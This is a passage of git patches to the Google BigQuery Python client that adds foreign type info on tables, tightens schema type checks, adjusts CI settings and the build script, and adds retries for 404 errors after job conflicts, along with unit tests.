Any, cast, Dict, Iterable, Optional, Union +from typing import Any, cast, Dict, Iterable, Optional, Union, Sequence from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql @@ -489,6 +488,8 @@ def _parse_schema_resource(info): Optional[Sequence[google.cloud.bigquery.schema.SchemaField`]: A list of parsed fields, or ``None`` if no "fields" key found. """ + if isinstance(info, list): + return [SchemaField.from_api_repr(f) for f in info] return [SchemaField.from_api_repr(f) for f in info.get("fields", ())] @@ -501,40 +502,46 @@ def _build_schema_resource(fields): Returns: Sequence[Dict]: Mappings describing the schema of the supplied fields. """ - return [field.to_api_repr() for field in fields] + if isinstance(fields, Sequence): + # Input is a Sequence (e.g. a list): Process and return a list of SchemaFields + return [field.to_api_repr() for field in fields] + + else: + raise TypeError("Schema must be a Sequence (e.g. a list) or None.") def _to_schema_fields(schema): - """Coerce `schema` to a list of schema field instances. + """Coerces schema to a list of SchemaField instances while + preserving the original structure as much as possible. Args: - schema(Sequence[Union[ \ - :class:`~google.cloud.bigquery.schema.SchemaField`, \ - Mapping[str, Any] \ - ]]): - Table schema to convert. If some items are passed as mappings, - their content must be compatible with - :meth:`~google.cloud.bigquery.schema.SchemaField.from_api_repr`. + schema (Sequence[Union[ \ + :class:`~google.cloud.bigquery.schema.SchemaField`, \ + Mapping[str, Any] \ + ] + ] + ):: + Table schema to convert. Can be a list of SchemaField + objects or mappings. Returns: - Sequence[:class:`~google.cloud.bigquery.schema.SchemaField`] + A list of SchemaField objects. Raises: - Exception: If ``schema`` is not a sequence, or if any item in the - sequence is not a :class:`~google.cloud.bigquery.schema.SchemaField` - instance or a compatible mapping representation of the field. + TypeError: If schema is not a Sequence. """ - for field in schema: - if not isinstance(field, (SchemaField, collections.abc.Mapping)): - raise ValueError( - "Schema items must either be fields or compatible " - "mapping representations." - ) - return [ - field if isinstance(field, SchemaField) else SchemaField.from_api_repr(field) - for field in schema - ] + if isinstance(schema, Sequence): + # Input is a Sequence (e.g. a list): Process and return a list of SchemaFields + return [ + field + if isinstance(field, SchemaField) + else SchemaField.from_api_repr(field) + for field in schema + ] + + else: + raise TypeError("Schema must be a Sequence (e.g. a list) or None.") class PolicyTagList(object): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 934a28cfc..c70a0ebea 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -21,7 +21,8 @@ import functools import operator import typing -from typing import Any, Dict, Iterable, Iterator, List, Optional, Tuple, Union +from typing import Any, Dict, Iterable, Iterator, List, Optional, Tuple, Union, Sequence + import warnings try: @@ -66,6 +67,7 @@ from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration from google.cloud.bigquery.enums import DefaultPandasDTypes from google.cloud.bigquery.external_config import ExternalConfig +from google.cloud.bigquery import schema as _schema from google.cloud.bigquery.schema import _build_schema_resource from google.cloud.bigquery.schema import _parse_schema_resource from google.cloud.bigquery.schema import _to_schema_fields @@ -398,7 +400,7 @@ class Table(_TableBase): "partitioning_type": "timePartitioning", "range_partitioning": "rangePartitioning", "time_partitioning": "timePartitioning", - "schema": "schema", + "schema": ["schema", "fields"], "snapshot_definition": "snapshotDefinition", "clone_definition": "cloneDefinition", "streaming_buffer": "streamingBuffer", @@ -411,6 +413,7 @@ class Table(_TableBase): "max_staleness": "maxStaleness", "resource_tags": "resourceTags", "external_catalog_table_options": "externalCatalogTableOptions", + "foreign_type_info": ["schema", "foreignTypeInfo"], } def __init__(self, table_ref, schema=None) -> None: @@ -451,8 +454,20 @@ def schema(self): If ``schema`` is not a sequence, or if any item in the sequence is not a :class:`~google.cloud.bigquery.schema.SchemaField` instance or a compatible mapping representation of the field. + + .. Note:: + If you are referencing a schema for an external catalog table such + as a Hive table, it will also be necessary to populate the foreign_type_info + attribute. This is not necessary if defining the schema for a BigQuery table. + + For details, see: + https://cloud.google.com/bigquery/docs/external-tables + https://cloud.google.com/bigquery/docs/datasets-intro#external_datasets + """ - prop = self._properties.get(self._PROPERTY_TO_API_FIELD["schema"]) + prop = _helpers._get_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["schema"] + ) if not prop: return [] else: @@ -463,10 +478,21 @@ def schema(self, value): api_field = self._PROPERTY_TO_API_FIELD["schema"] if value is None: - self._properties[api_field] = None - else: + _helpers._set_sub_prop( + self._properties, + api_field, + None, + ) + elif isinstance(value, Sequence): value = _to_schema_fields(value) - self._properties[api_field] = {"fields": _build_schema_resource(value)} + value = _build_schema_resource(value) + _helpers._set_sub_prop( + self._properties, + api_field, + value, + ) + else: + raise TypeError("Schema must be a Sequence (e.g. a list) or None.") @property def labels(self): @@ -1075,6 +1101,43 @@ def external_catalog_table_options( self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] ] = value + @property + def foreign_type_info(self) -> Optional[_schema.ForeignTypeInfo]: + """Optional. Specifies metadata of the foreign data type definition in + field schema (TableFieldSchema.foreign_type_definition). + + Returns: + Optional[schema.ForeignTypeInfo]: + Foreign type information, or :data:`None` if not set. + + .. Note:: + foreign_type_info is only required if you are referencing an + external catalog such as a Hive table. + For details, see: + https://cloud.google.com/bigquery/docs/external-tables + https://cloud.google.com/bigquery/docs/datasets-intro#external_datasets + """ + + prop = _helpers._get_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["foreign_type_info"] + ) + if prop is not None: + return _schema.ForeignTypeInfo.from_api_repr(prop) + return None + + @foreign_type_info.setter + def foreign_type_info(self, value: Union[_schema.ForeignTypeInfo, dict, None]): + value = _helpers._isinstance_or_raise( + value, + (_schema.ForeignTypeInfo, dict), + none_allowed=True, + ) + if isinstance(value, _schema.ForeignTypeInfo): + value = value.to_api_repr() + _helpers._set_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["foreign_type_info"], value + ) + @classmethod def from_string(cls, full_table_id: str) -> "Table": """Construct a table from fully-qualified table ID. diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 0fb044696..10df46fb3 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -272,7 +272,7 @@ def test_schema_setter_invalid_field(self): config = LoadJobConfig() full_name = SchemaField("full_name", "STRING", mode="REQUIRED") - with self.assertRaises(ValueError): + with self.assertRaises(TypeError): config.schema = [full_name, object()] def test_schema_setter(self): diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index a5af37b6b..6897c2552 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2051,7 +2051,7 @@ def test_update_dataset(self): ds.labels = LABELS ds.access_entries = [AccessEntry("OWNER", "userByEmail", "phred@example.com")] ds.resource_tags = RESOURCE_TAGS - fields = [ + filter_fields = [ "description", "friendly_name", "location", @@ -2065,12 +2065,12 @@ def test_update_dataset(self): ) as final_attributes: ds2 = client.update_dataset( ds, - fields=fields, + fields=filter_fields, timeout=7.5, ) final_attributes.assert_called_once_with( - {"path": "/%s" % PATH, "fields": fields}, client, None + {"path": "/%s" % PATH, "fields": filter_fields}, client, None ) conn.api_request.assert_called_once_with( @@ -2615,7 +2615,7 @@ def test_update_table_w_schema_None(self): self.assertEqual(len(conn.api_request.call_args_list), 2) req = conn.api_request.call_args_list[1] self.assertEqual(req[1]["method"], "PATCH") - sent = {"schema": None} + sent = {"schema": {"fields": None}} self.assertEqual(req[1]["data"], sent) self.assertEqual(req[1]["path"], "/%s" % path) self.assertEqual(len(updated_table.schema), 0) diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 467f1e1de..3f2304a70 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -765,27 +765,62 @@ def test__parse_schema_resource_fields_without_mode(self): self._verifySchema(schema, RESOURCE) -class Test_build_schema_resource(unittest.TestCase, _SchemaBase): +class Test_build_schema_resource: + """Tests for the _build_schema_resource function.""" + def _call_fut(self, resource): - from google.cloud.bigquery.schema import _build_schema_resource + return schema._build_schema_resource(resource) + + FULL_NAME = schema.SchemaField( + name="full_name", field_type="STRING", mode="REQUIRED" + ) + AGE = schema.SchemaField(name="age", field_type="INTEGER", mode="REQUIRED") + LIST_RESOURCE = [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ] + FOREIGN_TYPE_INFO = schema.ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED") + FOREIGN_TYPE_INFO_RESOURCE = {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"} + + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param([], [], id="empty list"), + pytest.param([FULL_NAME, AGE], LIST_RESOURCE, id="list"), + ], + ) + def test_ctor_valid_input(self, schema, expected): + result = self._call_fut(schema) + + assert result == expected - return _build_schema_resource(resource) + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param(123, TypeError, id="invalid type"), + ], + ) + def test_ctor_invalid_input(self, schema, expected): + with pytest.raises(TypeError) as e: + self._call_fut(schema) + + # Looking for the first phrase from the string "Schema must be a ..." + assert "Schema must be a " in str(e.value) def test_defaults(self): from google.cloud.bigquery.schema import SchemaField full_name = SchemaField("full_name", "STRING", mode="REQUIRED") age = SchemaField("age", "INTEGER", mode="REQUIRED") + # test with simple list resource = self._call_fut([full_name, age]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - ) - self.assertEqual( - resource[1], - {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + } + assert resource[1] == {"name": "age", "type": "INTEGER", "mode": "REQUIRED"} def test_w_description(self): from google.cloud.bigquery.schema import SchemaField @@ -802,25 +837,20 @@ def test_w_description(self): description=None, ) resource = self._call_fut([full_name, age]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - { - "name": "full_name", - "type": "STRING", - "mode": "REQUIRED", - "description": DESCRIPTION, - }, - ) - self.assertEqual( - resource[1], - { - "name": "age", - "type": "INTEGER", - "mode": "REQUIRED", - "description": None, - }, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "description": DESCRIPTION, + } + + assert resource[1] == { + "name": "age", + "type": "INTEGER", + "mode": "REQUIRED", + "description": None, + } def test_w_subfields(self): from google.cloud.bigquery.schema import SchemaField @@ -832,49 +862,72 @@ def test_w_subfields(self): "phone", "RECORD", mode="REPEATED", fields=[ph_type, ph_num] ) resource = self._call_fut([full_name, phone]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - ) - self.assertEqual( - resource[1], - { - "name": "phone", - "type": "RECORD", - "mode": "REPEATED", - "fields": [ - {"name": "type", "type": "STRING", "mode": "REQUIRED"}, - {"name": "number", "type": "STRING", "mode": "REQUIRED"}, - ], - }, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + } + assert resource[1] == { + "name": "phone", + "type": "RECORD", + "mode": "REPEATED", + "fields": [ + {"name": "type", "type": "STRING", "mode": "REQUIRED"}, + {"name": "number", "type": "STRING", "mode": "REQUIRED"}, + ], + } + +class Test_to_schema_fields: + """Tests for the _to_schema_fields function.""" -class Test_to_schema_fields(unittest.TestCase): @staticmethod def _call_fut(schema): from google.cloud.bigquery.schema import _to_schema_fields return _to_schema_fields(schema) - def test_invalid_type(self): - schema = [ - ("full_name", "STRING", "REQUIRED"), - ("address", "STRING", "REQUIRED"), - ] - with self.assertRaises(ValueError): - self._call_fut(schema) - - def test_schema_fields_sequence(self): - from google.cloud.bigquery.schema import SchemaField + FULL_NAME = schema.SchemaField( + name="full_name", field_type="STRING", mode="REQUIRED" + ) + AGE = schema.SchemaField(name="age", field_type="INTEGER", mode="REQUIRED") + LIST_RESOURCE = [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ] + FOREIGN_TYPE_INFO = schema.ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED") + FOREIGN_TYPE_INFO_RESOURCE = {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"} - schema = [ - SchemaField("full_name", "STRING", mode="REQUIRED"), - SchemaField("age", "INT64", mode="NULLABLE"), - ] + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param([], [], id="empty list"), + pytest.param((), [], id="empty tuple"), + pytest.param(LIST_RESOURCE, [FULL_NAME, AGE], id="list"), + ], + ) + def test_ctor_valid_input(self, schema, expected): result = self._call_fut(schema) - self.assertEqual(result, schema) + + assert result == expected + + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param(123, TypeError, id="invalid schema type"), + pytest.param([123, 123], TypeError, id="invalid SchemaField type"), + pytest.param({"fields": 123}, TypeError, id="invalid type, dict"), + pytest.param( + {"fields": 123, "foreignTypeInfo": 123}, + TypeError, + id="invalid type, dict", + ), + ], + ) + def test_ctor_invalid_input(self, schema, expected): + with pytest.raises(expected): + self._call_fut(schema) def test_unknown_properties(self): schema = [ @@ -933,7 +986,7 @@ def test_valid_mapping_representation(self): ] result = self._call_fut(schema) - self.assertEqual(result, expected_schema) + assert result == expected_schema class TestPolicyTags(unittest.TestCase): diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 5154f01d8..1a3d7ec0f 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -31,6 +31,7 @@ from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import exceptions from google.cloud.bigquery import external_config +from google.cloud.bigquery import schema from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import DatasetReference @@ -699,7 +700,7 @@ def test_schema_setter_invalid_field(self): table_ref = dataset.table(self.TABLE_NAME) table = self._make_one(table_ref) full_name = SchemaField("full_name", "STRING", mode="REQUIRED") - with self.assertRaises(ValueError): + with self.assertRaises(TypeError): table.schema = [full_name, object()] def test_schema_setter_valid_fields(self): @@ -1213,6 +1214,83 @@ def test_to_api_repr_w_unsetting_expiration(self): } self.assertEqual(resource, exp_resource) + def test_to_api_repr_w_schema_and_foreign_type_info(self): + """Tests to ensure that to_api_repr works correctly with + both schema and foreign_type_info fields + """ + + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + FOREIGNTYPEINFO = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + SCHEMA = { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreignTypeInfo": FOREIGNTYPEINFO, + } + + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": SCHEMA, + } + + table = self._get_target_class().from_api_repr(API_REPR) + assert table._properties == table.to_api_repr() + + # update schema (i.e. the fields), ensure foreign_type_info is unchanged + table.schema = [] + expected = { + "fields": [], + "foreignTypeInfo": {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}, + } + assert table.to_api_repr()["schema"] == expected + + # update foreign_type_info, ensure schema (i.e. the fields), is unchanged + table.foreign_type_info = {"typeSystem": "SCHEMA_SHOULD_NOT_CHANGE"} + expected = { + "fields": [], + "foreignTypeInfo": {"typeSystem": "SCHEMA_SHOULD_NOT_CHANGE"}, + } + assert table.to_api_repr()["schema"] == expected + + def test_from_api_repr_w_schema_and_foreign_type_info(self): + """Tests to ensure that to_api_repr works correctly with + both schema and foreign_type_info fields + """ + + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + FOREIGNTYPEINFO = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + SCHEMA = { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreignTypeInfo": FOREIGNTYPEINFO, + } + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": SCHEMA, + } + + table = self._get_target_class().from_api_repr(API_REPR) + assert table._properties == API_REPR + def test__build_resource_w_custom_field(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -5993,6 +6071,99 @@ def test_external_catalog_table_options_from_api_repr(self): assert result == expected +class TestForeignTypeInfo: + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + DATASET = DatasetReference(PROJECT, DATASET_ID) + TABLEREF = DATASET.table(TABLE_ID) + FOREIGNTYPEINFO = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreign_info_type": FOREIGNTYPEINFO, + }, + } + + from google.cloud.bigquery.schema import ForeignTypeInfo + + @staticmethod + def _get_target_class(self): + from google.cloud.bigquery.table import Table + + return Table + + def _make_one(self, *args, **kw): + return self._get_target_class(self)(*args, **kw) + + def test_foreign_type_info_default_initialization(self): + table = self._make_one(self.TABLEREF) + assert table.foreign_type_info is None + + @pytest.mark.parametrize( + "foreign_type_info, expected", + [ + ( + {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}, + "TYPE_SYSTEM_UNSPECIFIED", + ), + (None, None), + ( + ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED"), + "TYPE_SYSTEM_UNSPECIFIED", + ), + ], + ) + def test_foreign_type_info_valid_inputs(self, foreign_type_info, expected): + table = self._make_one(self.TABLEREF) + + table.foreign_type_info = foreign_type_info + + if foreign_type_info is None: + result = table.foreign_type_info + else: + result = table.foreign_type_info.type_system + assert result == expected + + def test_foreign_type_info_invalid_inputs(self): + table = self._make_one(self.TABLEREF) + + # invalid on the whole + with pytest.raises(TypeError, match="Pass .*"): + table.foreign_type_info = 123 + + def test_foreign_type_info_to_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.foreign_type_info = self.ForeignTypeInfo( + type_system="TYPE_SYSTEM_UNSPECIFIED", + ) + + result = table.to_api_repr()["schema"]["foreignTypeInfo"] + expected = self.FOREIGNTYPEINFO + assert result == expected + + def test_foreign_type_info_from_api_repr(self): + table = self._make_one(self.TABLEREF) + table.foreign_type_info = self.FOREIGNTYPEINFO + + fti = schema.ForeignTypeInfo.from_api_repr(self.FOREIGNTYPEINFO) + + result = fti.to_api_repr() + expected = self.FOREIGNTYPEINFO + assert result == expected + + @pytest.mark.parametrize( "table_path", ( From fea49ffbf8aa1d53451864ceb7fd73189b6661cb Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 21 Feb 2025 14:16:20 -0500 Subject: [PATCH 066/202] deps: updates required checks list in github (#2136) * deps: updates required checks list in github * deps: updates snippet and system checks in github to remove 3.9 * changes the order of two items in the list. --- .github/sync-repo-settings.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 6543d5285..188c44bbd 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -10,14 +10,10 @@ branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro snippets-3.8' - - 'Kokoro snippets-3.12' - - 'Kokoro system-3.8' - 'Kokoro system-3.12' + - 'Kokoro snippets-3.12' - 'cla/google' - 'Samples - Lint' - - 'Samples - Python 3.7' - - 'Samples - Python 3.8' - 'Samples - Python 3.9' - 'Samples - Python 3.10' - 'Samples - Python 3.11' @@ -28,8 +24,7 @@ branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro snippets-3.8' - 'cla/google' - 'Samples - Lint' - - 'Samples - Python 3.7' - - 'Samples - Python 3.8' + - 'Samples - Python 3.9' + - 'Samples - Python 3.10' From de10185c5faab6e9c6f12a6423be09ffb83c4ff6 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 25 Feb 2025 11:04:23 -0800 Subject: [PATCH 067/202] chore(python): conditionally load credentials in .kokoro/build.sh (#2137) Source-Link: https://github.com/googleapis/synthtool/commit/aa69fb74717c8f4c58c60f8cc101d3f4b2c07b09 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/build.sh | 20 ++++++++++++++------ 2 files changed, 16 insertions(+), 8 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 4c0027ff1..3f7634f25 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a -# created: 2025-01-16T15:24:11.364245182Z + digest: sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf +# created: 2025-02-21T19:32:52.01306189Z diff --git a/.kokoro/build.sh b/.kokoro/build.sh index e4da2e2a7..d41b45aa1 100755 --- a/.kokoro/build.sh +++ b/.kokoro/build.sh @@ -15,11 +15,13 @@ set -eo pipefail +CURRENT_DIR=$(dirname "${BASH_SOURCE[0]}") + if [[ -z "${PROJECT_ROOT:-}" ]]; then - PROJECT_ROOT="github/python-bigquery" + PROJECT_ROOT=$(realpath "${CURRENT_DIR}/..") fi -cd "${PROJECT_ROOT}" +pushd "${PROJECT_ROOT}" # Disable buffering, so that the logs stream through. export PYTHONUNBUFFERED=1 @@ -28,10 +30,16 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Setup service account credentials. -export GOOGLE_APPLICATION_CREDENTIALS=${KOKORO_GFILE_DIR}/service-account.json +if [[ -f "${KOKORO_GFILE_DIR}/service-account.json" ]] +then + export GOOGLE_APPLICATION_CREDENTIALS=${KOKORO_GFILE_DIR}/service-account.json +fi # Setup project id. -export PROJECT_ID=$(cat "${KOKORO_GFILE_DIR}/project-id.json") +if [[ -f "${KOKORO_GFILE_DIR}/project-id.json" ]] +then + export PROJECT_ID=$(cat "${KOKORO_GFILE_DIR}/project-id.json") +fi # If this is a continuous build, send the test log to the FlakyBot. # See https://github.com/googleapis/repo-automation-bots/tree/main/packages/flakybot. @@ -46,7 +54,7 @@ fi # If NOX_SESSION is set, it only runs the specified session, # otherwise run all the sessions. if [[ -n "${NOX_SESSION:-}" ]]; then - python3 -m nox -s ${NOX_SESSION:-} + python3 -m nox -s ${NOX_SESSION:-} else - python3 -m nox + python3 -m nox fi From c6d5f8aaec21ab8f17436407aded4bc2316323fd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Tue, 25 Feb 2025 20:24:36 -0600 Subject: [PATCH 068/202] fix: retry 404 errors in `Client.query(...)` (#2135) * fix: retry 404 errors in `Client.query(...)` * retry on 404 * only retry notfound on jobs.insert * try to improve code coverage * disambiguate job not found from dataset/table not found * remove use of private attributes * fix unit tests * fix cover for retry.py --- google/cloud/bigquery/_job_helpers.py | 27 +++- google/cloud/bigquery/retry.py | 54 ++++++++ tests/unit/test_client.py | 174 +++++++++++++++++++++++++- 3 files changed, 252 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index e66ab2763..b028cd357 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -47,6 +47,7 @@ from google.cloud.bigquery import job import google.cloud.bigquery.query from google.cloud.bigquery import table +import google.cloud.bigquery.retry from google.cloud.bigquery.retry import POLLING_DEFAULT_VALUE # Avoid circular imports @@ -142,12 +143,28 @@ def do_query(): raise create_exc try: + # Sometimes we get a 404 after a Conflict. In this case, we + # have pretty high confidence that by retrying the 404, we'll + # (hopefully) eventually recover the job. + # https://github.com/googleapis/python-bigquery/issues/2134 + # + # Allow users who want to completely disable retries to + # continue to do so by setting retry to None. + get_job_retry = retry + if retry is not None: + # TODO(tswast): Amend the user's retry object with allowing + # 404 to retry when there's a public way to do so. + # https://github.com/googleapis/python-api-core/issues/796 + get_job_retry = ( + google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY + ) + query_job = client.get_job( job_id, project=project, location=location, - retry=retry, - timeout=timeout, + retry=get_job_retry, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, ) except core_exceptions.GoogleAPIError: # (includes RetryError) raise @@ -156,7 +173,13 @@ def do_query(): else: return query_job + # Allow users who want to completely disable retries to + # continue to do so by setting job_retry to None. + if job_retry is not None: + do_query = google.cloud.bigquery.retry._DEFAULT_QUERY_JOB_INSERT_RETRY(do_query) + future = do_query() + # The future might be in a failed state now, but if it's # unrecoverable, we'll find out when we ask for it's result, at which # point, we may retry. diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 10958980d..999d0e851 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -82,6 +82,32 @@ def _should_retry(exc): pass ``retry=bigquery.DEFAULT_RETRY.with_deadline(30)``. """ + +def _should_retry_get_job_conflict(exc): + """Predicate for determining when to retry a jobs.get call after a conflict error. + + Sometimes we get a 404 after a Conflict. In this case, we + have pretty high confidence that by retrying the 404, we'll + (hopefully) eventually recover the job. + https://github.com/googleapis/python-bigquery/issues/2134 + + Note: we may be able to extend this to user-specified predicates + after https://github.com/googleapis/python-api-core/issues/796 + to tweak existing Retry object predicates. + """ + return isinstance(exc, exceptions.NotFound) or _should_retry(exc) + + +# Pick a deadline smaller than our other deadlines since we want to timeout +# before those expire. +_DEFAULT_GET_JOB_CONFLICT_DEADLINE = _DEFAULT_RETRY_DEADLINE / 3.0 +_DEFAULT_GET_JOB_CONFLICT_RETRY = retry.Retry( + predicate=_should_retry_get_job_conflict, + deadline=_DEFAULT_GET_JOB_CONFLICT_DEADLINE, +) +"""Private, may be removed in future.""" + + # Note: Take care when updating DEFAULT_TIMEOUT to anything but None. We # briefly had a default timeout, but even setting it at more than twice the # theoretical server-side default timeout of 2 minutes was not enough for @@ -142,6 +168,34 @@ def _job_should_retry(exc): The default job retry object. """ + +def _query_job_insert_should_retry(exc): + # Per https://github.com/googleapis/python-bigquery/issues/2134, sometimes + # we get a 404 error. In this case, if we get this far, assume that the job + # doesn't actually exist and try again. We can't add 404 to the default + # job_retry because that happens for errors like "this table does not + # exist", which probably won't resolve with a retry. + if isinstance(exc, exceptions.RetryError): + exc = exc.cause + + if isinstance(exc, exceptions.NotFound): + message = exc.message + # Don't try to retry table/dataset not found, just job not found. + # The URL contains jobs, so use whitespace to disambiguate. + return message is not None and " job" in message.lower() + + return _job_should_retry(exc) + + +_DEFAULT_QUERY_JOB_INSERT_RETRY = retry.Retry( + predicate=_query_job_insert_should_retry, + # jobs.insert doesn't wait for the job to complete, so we don't need the + # long _DEFAULT_JOB_DEADLINE for this part. + deadline=_DEFAULT_RETRY_DEADLINE, +) +"""Private, may be removed in future.""" + + DEFAULT_GET_JOB_TIMEOUT = 128 """ Default timeout for Client.get_job(). diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 6897c2552..4f13d6ecc 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -28,9 +28,12 @@ from unittest import mock import warnings -import requests +import freezegun import packaging import pytest +import requests + +import google.api try: @@ -55,6 +58,8 @@ import google.cloud._helpers from google.cloud import bigquery +from google.cloud.bigquery import job as bqjob +import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions @@ -5308,6 +5313,173 @@ def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails(self): with pytest.raises(DataLoss, match="we lost your job, sorry"): client.query("SELECT 1;", job_id=None) + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails_no_retries(self): + from google.api_core.exceptions import Conflict + from google.api_core.exceptions import DataLoss + from google.cloud.bigquery.job import QueryJob + + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + job_create_error = Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + QueryJob, "_begin", side_effect=job_create_error + ) + get_job_patcher = mock.patch.object( + client, "get_job", side_effect=DataLoss("we lost your job, sorry") + ) + + with job_begin_patcher, get_job_patcher: + # If get job request fails but supposedly there does exist a job + # with this ID already, raise the exception explaining why we + # couldn't recover the job. + with pytest.raises(DataLoss, match="we lost your job, sorry"): + client.query( + "SELECT 1;", + job_id=None, + # Explicitly test with no retries to make sure those branches are covered. + retry=None, + job_retry=None, + ) + + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404(self): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404, but we know + because of the conflict that really the job does exist. Retry until we + get the job status (or timeout). + """ + job_id = "abc123" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection( + # We're mocking QueryJob._begin, so this is 